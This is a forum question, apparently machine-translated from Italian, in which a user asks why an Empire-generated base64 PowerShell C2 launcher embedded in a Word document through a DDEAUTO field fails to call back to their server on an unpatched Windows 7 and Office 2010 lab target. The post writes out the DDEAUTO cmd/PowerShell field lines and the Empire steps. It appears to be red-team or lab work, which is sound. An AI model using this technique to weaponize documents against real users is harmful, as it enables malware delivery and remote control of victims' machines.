Quindi sto riscontrando un grosso problema nel tentativo di far funzionare correttamente questa semplice tecnica di sfruttamento. Questo è anche per un lavoro e una delle attività che devo completare.
Devo utilizzare il framework Empire ( link ) Post-Exploitation, comunque inizia da me a generare un semplice listener per il mio server Empire C2. ex. Listener: myserver link
Ora devo generare uno script di PowerShell vulnerabile da eseguire sulla macchina virtuale di destinazione Win7. ( link ) < --- L'AV potrebbe sparire perché è lo script di PowerShell che richiama l'Empire C2, ma è innocuo.)
utilizzando il comando "launcher powershell myserver" Empire genera uno script PowerShell codificato con base64 ed è una chiamata al mio server Empire C2. (Attacker Machine) ( link )
Ora ho bisogno di usare l'exploit vulnerabile di DDE Office usando la funzione DDEAUTO, e lo incorporo nel mio script PowerShell in esso, quindi quando si fa clic su .DOC si richiamerà al mio Empire C2.
Prima di inserire qualsiasi cosa nel documento word, ho provato a eseguire lo script PowerShell in PowerShell per vedere se richiamava al server C2 ... Che funzionava bene. Quindi lo script base64 funziona e va bene.
Quindi apro l'ufficio 2010 e faccio l'input e il forum {DDEAUTO "c: \ Windows \ System32 \ cmd.exe" / k powershell "} per verificare se l'exploit funziona.
e, naturalmente, funziona bene e pops cmd e powershell.
Ora è arrivato il momento di EMBED nello script con lo script codificato PowerShell Base64. utilizzando {DDEAUTO "C: \ Windows \ System32 \ cmd.exe" / k powershell -noP -sta -w 1 -enc (script con codifica Base64) "}
ma non ricevo alcuna chiamata al C2 e ho provato altri modi come C: \ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe '/ k .....
e altri comandi, e giocando con le virgolette ... ma senza fortuna. Ci gioco da giorni e non riesco a capire perché non si avvierà e funziona bene se lancio lo script da solo normalmente in cmd e powershell, è solo quando lo faccio nel .DOC
Quando ho mandato la persona al lavoro per dire che ho provato tutti questi modi ma non averlo capito, la persona mi ha detto: sei sulla strada giusta; hai colto il problema a cui mi riferivo. Fai qualche ricerca su quale possa essere il problema; considera ciò che è diverso tra questo carico utile e altri.
Non ho idea di cosa sto facendo male, smette di funzionare quando chiama powershell in cmd e non avvia lo script di PowerShell.
Windows Defender è OFF, Firewall è OFF, Win7 (Target) non è aggiornato e Office2010 non è aggiornato, Tutto dovrebbe funzionare ..
Se qualcuno può trovare il problema con questo, o quello che sto facendo male sarebbe molto apprezzato. Ho chiesto su molti forum e su IRC e non riesco ancora a ottenere nulla. Mi manca qualcosa.
grazie